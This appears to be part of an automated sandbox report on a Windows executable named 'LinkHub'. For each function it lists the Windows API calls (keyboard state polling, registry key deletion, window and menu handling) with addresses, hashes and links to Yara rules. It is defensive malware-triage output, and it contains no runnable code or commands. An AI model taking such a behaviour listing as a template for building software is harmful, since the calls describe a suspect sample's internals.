                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                        • String ID: ThumbnailClass
                                                                                        • API String ID: 1311036022-1241985126
                                                                                        • Opcode ID: 516b68f7a491d099b690d07cb3d3797b7df3a829f2a8c3a3de8370c0c732bb2d
                                                                                        • Instruction ID: 2bdb14a64c03c7a10f30ce30bf120d4960ac1bff09a373c5aabd093a596de72f
                                                                                        • Opcode Fuzzy Hash: 516b68f7a491d099b690d07cb3d3797b7df3a829f2a8c3a3de8370c0c732bb2d
                                                                                        • Instruction Fuzzy Hash: AC91F471124B17AFD718DF24D898BAAB7A9FF00304F504519FA8A82191EB31EDB5CF91
                                                                                        Function 0026C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(002D29C0,000000FF,00000000,00000030), ref: 0026C973
                                                                                        • SetMenuItemInfoW.USER32(002D29C0,00000004,00000000,00000030), ref: 0026C9A8
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0026C9BA
                                                                                        • GetMenuItemCount.USER32(?), ref: 0026CA00
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0026CA1D
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 0026CA49
                                                                                        • GetMenuItemID.USER32(?,?), ref: 0026CA90
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0026CAD6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026CAEB
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026CB0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                        • String ID: 0
                                                                                        • API String ID: 1460738036-4108050209
                                                                                        • Opcode ID: d879e99c31e20d901a787fc76ff449f543461ec9db3e43ca9c7f8bb825eb88d2
                                                                                        • Instruction ID: 21a9c7f8150015e3e16bdf38fd08e866b53a67128a337bce375eb1780f2f3093
                                                                                        • Opcode Fuzzy Hash: d879e99c31e20d901a787fc76ff449f543461ec9db3e43ca9c7f8bb825eb88d2
                                                                                        • Instruction Fuzzy Hash: CA61C57092024AAFDF11EFA4DD89AFE7BB8FF05348F240055E891A3251D731ADA4DB60
                                                                                        Function 0026E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0026E4D4
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0026E4FA
                                                                                        • _wcslen.LIBCMT ref: 0026E504
                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0026E554
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0026E570
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 1939486746-1459072770
                                                                                        • Opcode ID: 790771bf0f2618703a4e0f9f9a5d26ccf88fc5788517e2141aea9fbf39509a0e
                                                                                        • Instruction ID: 693a0d2650f9135e5c9759ea80d065a7ae2a11bcbfec19858d7c4d5d63d7102b
                                                                                        • Opcode Fuzzy Hash: 790771bf0f2618703a4e0f9f9a5d26ccf88fc5788517e2141aea9fbf39509a0e
                                                                                        • Instruction Fuzzy Hash: 834147725202247BEF00ABA4EC47EFF776CDF51710F50015AF905A6082EB749A71AAA5
                                                                                        Function 0028D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028D6C4
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0028D6ED
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028D7A8
                                                                                          • Part of subcall function 0028D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0028D70A
                                                                                          • Part of subcall function 0028D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0028D71D
                                                                                          • Part of subcall function 0028D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028D72F
                                                                                          • Part of subcall function 0028D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0028D765
                                                                                          • Part of subcall function 0028D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0028D788
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0028D753
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2734957052-4033151799
                                                                                        • Opcode ID: 08b8e094e73d9e082c6c709de165bce01a57342f67177df5f37832e23f520a64
                                                                                        • Instruction ID: 6494ed449007d9bd13edd67eb350983e1702b006ad6d7b78c6fd9e125c0a6efa
                                                                                        • Opcode Fuzzy Hash: 08b8e094e73d9e082c6c709de165bce01a57342f67177df5f37832e23f520a64
                                                                                        • Instruction Fuzzy Hash: 5D316176912129BBD721AF50EC88EFFBB7CEF46710F000166F905E2180DB749E599BA0
                                                                                        Function 0026EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 0026EFCB
                                                                                          • Part of subcall function 0021F215: timeGetTime.WINMM(?,?,0026EFEB), ref: 0021F219
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0026EFF8
                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0026F01C
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0026F03E
                                                                                        • SetActiveWindow.USER32 ref: 0026F05D
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0026F06B
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0026F08A
                                                                                        • Sleep.KERNEL32(000000FA), ref: 0026F095
                                                                                        • IsWindow.USER32 ref: 0026F0A1
                                                                                        • EndDialog.USER32(00000000), ref: 0026F0B2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: e88cf7f10601f7ee337634048ccc19d39e22100b9f22250dc43b69b015583f79
                                                                                        • Instruction ID: c4e614d26e858ea564ee6f047895ca354a560f3fd2bda19e9a112d95949e9bd4
                                                                                        • Opcode Fuzzy Hash: e88cf7f10601f7ee337634048ccc19d39e22100b9f22250dc43b69b015583f79
                                                                                        • Instruction Fuzzy Hash: B4210575929205BFEB10AF30FC8DB267B6DF759754F000027F80582276DB728CA49BA2
                                                                                        Function 0026F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0026F374
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0026F38A
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026F39B
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0026F3AD
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0026F3BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_wcslen
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2420728520-1007645807
                                                                                        • Opcode ID: a1c0be87eb4e4c467bf79f48b8dd4078c6b9019b69b9216fe7cef782f88e8d02
                                                                                        • Instruction ID: 3f14a3057147a6b53d9f4a52c648d070d62484363ca55f6b25cce51ee950edae
                                                                                        • Opcode Fuzzy Hash: a1c0be87eb4e4c467bf79f48b8dd4078c6b9019b69b9216fe7cef782f88e8d02
                                                                                        • Instruction Fuzzy Hash: 3E119171A702997ADB20A7669C4AFFF7A7CEB96B40F4005697401E20D1DAA05964C9A0
                                                                                        Function 00232FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00233007
                                                                                          • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
                                                                                          • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
                                                                                        • _free.LIBCMT ref: 00233013
                                                                                        • _free.LIBCMT ref: 0023301E
                                                                                        • _free.LIBCMT ref: 00233029
                                                                                        • _free.LIBCMT ref: 00233034
                                                                                        • _free.LIBCMT ref: 0023303F
                                                                                        • _free.LIBCMT ref: 0023304A
                                                                                        • _free.LIBCMT ref: 00233055
                                                                                        • _free.LIBCMT ref: 00233060
                                                                                        • _free.LIBCMT ref: 0023306E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID: &*
                                                                                        • API String ID: 776569668-4233420398
                                                                                        • Opcode ID: d63c66e2fb2495739caa675b92d441341ffb54ddb5ec6ab89bb25ea2b0a8770b
                                                                                        • Instruction ID: b3629e32830c30298e6a5588b78214bd20b49c7b846744deff8002c2dd49a19a
                                                                                        • Opcode Fuzzy Hash: d63c66e2fb2495739caa675b92d441341ffb54ddb5ec6ab89bb25ea2b0a8770b
                                                                                        • Instruction Fuzzy Hash: 0A1174B652010CEFCB01EF94DA42DDD3BA5EF05350F9145A5FA089B222DA31EA659F90
                                                                                        Function 0026A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 0026A9D9
                                                                                        • SetKeyboardState.USER32(?), ref: 0026AA44
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0026AA64
                                                                                        • GetKeyState.USER32(000000A0), ref: 0026AA7B
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0026AAAA
                                                                                        • GetKeyState.USER32(000000A1), ref: 0026AABB
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0026AAE7
                                                                                        • GetKeyState.USER32(00000011), ref: 0026AAF5
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0026AB1E
                                                                                        • GetKeyState.USER32(00000012), ref: 0026AB2C
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0026AB55
                                                                                        • GetKeyState.USER32(0000005B), ref: 0026AB63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 0d275d48decc863384202f4c25042c05d10aa0307f4123da303adcec88f0aafb
                                                                                        • Instruction ID: e1e8042acf3f02f3cb2c568524b80f449cc0f04fa7e3d1e77de1b716afc368c5
                                                                                        • Opcode Fuzzy Hash: 0d275d48decc863384202f4c25042c05d10aa0307f4123da303adcec88f0aafb
                                                                                        • Instruction Fuzzy Hash: 4D510620A1478629FB31DFB48850BEABFB49F12344F08459AC5C26A1C2DA549FDCCF63
                                                                                        Function 0026662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00266649
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00266662
                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002666C0
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 002666D0
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002666E2
                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00266736
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00266744
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00266756
                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00266798
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002667AB
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002667C1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002667CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 8b797acd6145eac7fec7a59be504dcdf958b24efd4fa841789c1bc6a86cebb67
                                                                                        • Instruction ID: 2feecced9e2bc29089578396e0ec556ff67842d6811a37bc91569e4384df49c8
                                                                                        • Opcode Fuzzy Hash: 8b797acd6145eac7fec7a59be504dcdf958b24efd4fa841789c1bc6a86cebb67
                                                                                        • Instruction Fuzzy Hash: 75513371B10206AFDF18CFA8DD89AAEBBB9FB48315F108129F519E7290D7709D54CB50
                                                                                        Function 00202128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • GetSysColor.USER32(0000000F), ref: 00202152
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 72bcad06964715e3b1dbe7dfb8fffcf6c6877f4446ba115858bcb64d993822b8
                                                                                        • Instruction ID: cd7614a219350db8bfab39bae31b357f0b033ef345356b067dc4d766d3f2e168
                                                                                        • Opcode Fuzzy Hash: 72bcad06964715e3b1dbe7dfb8fffcf6c6877f4446ba115858bcb64d993822b8
                                                                                        • Instruction Fuzzy Hash: AF41D131110341EFDB249F38AC4CBB97779AB46320F554246FAAA872E3C7719D66EB10
                                                                                        Function 002013A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002428D1
                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002428EA
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002428FA
                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00242912
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00242933
                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00242942
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0024295F
                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002011F5,00000000,00000000,00000000,000000FF,00000000), ref: 0024296E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 1268354404-4239615555
                                                                                        • Opcode ID: 8923efd6f054b678241a4563ecca8750842321ec5fed9a2461f81008ea81e4b9
                                                                                        • Instruction ID: 997735a730d7c3e677a3deb5e399192a3171a458f0e871733cc9b591cff483a3
                                                                                        • Opcode Fuzzy Hash: 8923efd6f054b678241a4563ecca8750842321ec5fed9a2461f81008ea81e4b9
                                                                                        • Instruction Fuzzy Hash: 39517930A20306EFDB24CF25DC89BAA7BB5EF58310F604519F942972E1D7B0A8A5DB50
                                                                                        Function 0029955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                          • Part of subcall function 002019CD: GetCursorPos.USER32(?), ref: 002019E1
                                                                                          • Part of subcall function 002019CD: ScreenToClient.USER32(00000000,?), ref: 002019FE
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000001), ref: 00201A23
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000002), ref: 00201A3D
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002995C7
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 002995CD
                                                                                        • ReleaseCapture.USER32 ref: 002995D3
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0029966E
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00299681
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0029975B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$(-$(-
                                                                                        • API String ID: 1924731296-987590486
                                                                                        • Opcode ID: 96e1152125c1f334ee12c2c5564ff95e7f3cdf313bb55497763422cc5c0fe2d5
                                                                                        • Instruction ID: 337afde51d843e1d72bb7ba54371cde9605818ca348f9d2b391d84dab30a4e01
                                                                                        • Opcode Fuzzy Hash: 96e1152125c1f334ee12c2c5564ff95e7f3cdf313bb55497763422cc5c0fe2d5
                                                                                        • Instruction Fuzzy Hash: 5F518A70524300AFDB14EF14DC5AFAA77E4FB88710F500A1EF995972E2CB709968DB52
                                                                                        Function 0026A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00250D31,00000001,0000138C,00000001,00000001,00000001,?,0027EEAE,002D2430), ref: 0026A091
                                                                                        • LoadStringW.USER32(00000000,?,00250D31,00000001), ref: 0026A09A
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00250D31,00000001,0000138C,00000001,00000001,00000001,?,0027EEAE,002D2430,?), ref: 0026A0BC
                                                                                        • LoadStringW.USER32(00000000,?,00250D31,00000001), ref: 0026A0BF
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026A1E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
